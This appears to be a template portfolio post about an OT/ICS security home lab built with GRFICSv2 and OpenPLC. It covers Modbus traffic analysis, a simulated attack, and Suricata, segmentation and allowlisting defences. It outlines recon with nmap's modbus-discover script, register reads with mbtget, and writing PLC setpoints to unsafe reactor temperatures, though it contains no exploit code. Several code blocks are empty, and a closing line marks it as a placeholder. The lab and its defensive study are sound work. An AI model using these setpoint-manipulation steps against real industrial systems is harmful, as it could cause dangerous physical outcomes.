Building an OT/ICS Home Lab with GRFICSv2 and OpenPLC
Overview
One of the biggest barriers to learning OT/ICS security is access to real industrial systems. You can’t exactly practice on a live water treatment plant. This project documents how I built a realistic OT/ICS lab environment using open-source tools, giving me a safe space to study Programmable Logic Controllers (PLCs), Human-Machine Interfaces (HMIs), and SCADA protocols.
Why This Matters
Industrial control systems manage critical infrastructure — power grids, water treatment, manufacturing, oil and gas pipelines. These systems were historically air-gapped, but increasing IT/OT convergence has exposed them to cyber threats they were never designed to handle. Understanding how these systems work and how to defend them is the foundation of OT cybersecurity.
Lab Architecture
The lab runs entirely in VirtualBox on a standard laptop and consists of:
- GRFICSv2 — A realistic ICS simulation of a chemical process (Tennessee Eastman process) with a PLC, HMI, and physical process simulation
- OpenPLC Runtime — An open-source PLC that runs IEC 61131-3 ladder logic programs
- ScadaBR — An open-source SCADA/HMI platform for process visualization
- Security Onion — Network security monitoring positioned to observe OT network traffic
- Kali Linux — For testing attack scenarios against the ICS environment
Network Segmentation
I configured the lab with proper OT network segmentation following the Purdue Model:
|
|
Key Activities
1. Modbus Protocol Analysis
Using Wireshark, I captured and analyzed Modbus/TCP traffic between the HMI and PLC. Modbus is one of the most common — and most vulnerable — industrial protocols. Key observations:
- Modbus has no authentication — any device on the network can read/write to registers
- Function codes are transmitted in cleartext
- There’s no integrity checking on commands
|
|
2. Simulating an Attack on the Chemical Process
Using Kali Linux, I demonstrated how an attacker on the OT network could:
- Reconnaissance — Scan for Modbus devices using
nmap --script modbus-discover - Read process values — Use
mbtgetto read PLC registers and understand the process state - Manipulate setpoints — Write to PLC holding registers to alter chemical process parameters
- Cause a safety condition — Modify reactor temperature setpoints beyond safe operating limits
Important: This was performed entirely in my isolated lab environment. The GRFICSv2 simulation shows how process manipulation could lead to a dangerous physical outcome — making the consequences of ICS attacks visceral and real.
3. Implementing Defenses
After understanding the attack surface, I implemented several defensive measures:
- Network monitoring with Security Onion to detect anomalous Modbus traffic
- Suricata IDS rules specifically for industrial protocol abuse
- Network segmentation to isolate the PLC network from the HMI/SCADA network
- Allowlisting — configuring the simulated firewall to permit only expected Modbus function codes
Lessons Learned
This lab fundamentally changed how I think about cybersecurity. IT security concepts like “patch everything” and “encrypt everything” don’t always apply in OT environments where availability is paramount and systems may run for decades without updates. The priorities shift from confidentiality to safety and availability, and the defender’s mindset must shift accordingly.
Relevance to My MSc Goals
This project directly supports my interest in pursuing graduate research on securing legacy industrial protocols and developing intrusion detection methods tailored to OT environments. The hands-on experience with Modbus, PLC logic, and ICS architecture gives me a practical foundation that complements academic study.
Resources
- GRFICSv2 on GitHub
- OpenPLC Project
- NIST SP 800-82: Guide to ICS Security
- Purdue Enterprise Reference Architecture (PERA)
- SANS ICS Resources
Replace this content with your actual lab setup details, screenshots of your GRFICSv2 environment, Wireshark captures, and specific findings.